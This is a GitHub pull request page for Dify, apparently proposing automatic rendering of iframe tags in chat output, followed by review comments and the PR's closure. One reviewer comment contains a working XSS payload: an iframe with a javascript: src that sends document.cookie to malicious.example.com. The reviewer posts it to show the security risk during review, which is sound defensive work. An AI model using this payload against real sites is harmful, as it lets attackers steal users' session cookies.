dify icon indicating copy to clipboard operation
dify copied to clipboard

Published 20 hours ago verified publisher icon langgenius

iframe front end rendering

Open charli117 opened this issue 4 months ago • 4 comments

Description

When the generated content contains an iframe tag, the front end implements automatic embedding rendering,The supported parameters and recommended formats are as follows, Note that the src parameter is required, and the default value is provided if the others are left blank:

.

Fixes # (issue)

Type of Change

Please delete options that are not relevant.

  • [ ] Bug fix (non-breaking change which fixes an issue)
  • [x] New feature (non-breaking change which adds functionality)
  • [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
  • [ ] This change requires a documentation update, included: Dify Document

How Has This Been Tested?

Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration

  • [ ] TODO

Suggested Checklist:

  • [x] I have performed a self-review of my own code
  • [ ] I have commented my code, particularly in hard-to-understand areas
  • [x] My changes generate no new warnings
  • [ ] I ran dev/reformat(backend) and cd web && npx lint-staged(frontend) to appease the lint gods
  • [ ] optional I have made corresponding changes to the documentation
  • [ ] optional I have added tests that prove my fix is effective or that my feature works
  • [ ] optional New and existing unit tests pass locally with my changes

charli117 avatar Feb 28 '24 12:02 charli117 

<h1>Welcome to My Web Page</h1>

<iframe style="display:none" src="javascript:document.write('<script>document.location="http://malicious.example.com/steal-cookie?cookie="+document.cookie</script>')" ></iframe>

This PR could lead potential XSS attack in chat bubble.

Fixed this issue

charli117 avatar Feb 29 '24 14:02 charli117 

    <h1 style="color: red;">Red Text</h1>
    <h1 style="color: green;">Green Text</h1>
    <h1 style="color: blue;">Blue Text</h1>
image

crazywoola avatar Mar 04 '24 01:03 crazywoola

Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.

ifsheldon avatar Apr 07 '24 07:04 ifsheldon

Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.

@charli117

crazywoola avatar Apr 09 '24 09:04 crazywoola

Close for now.

crazywoola avatar Apr 16 '24 13:04 crazywoola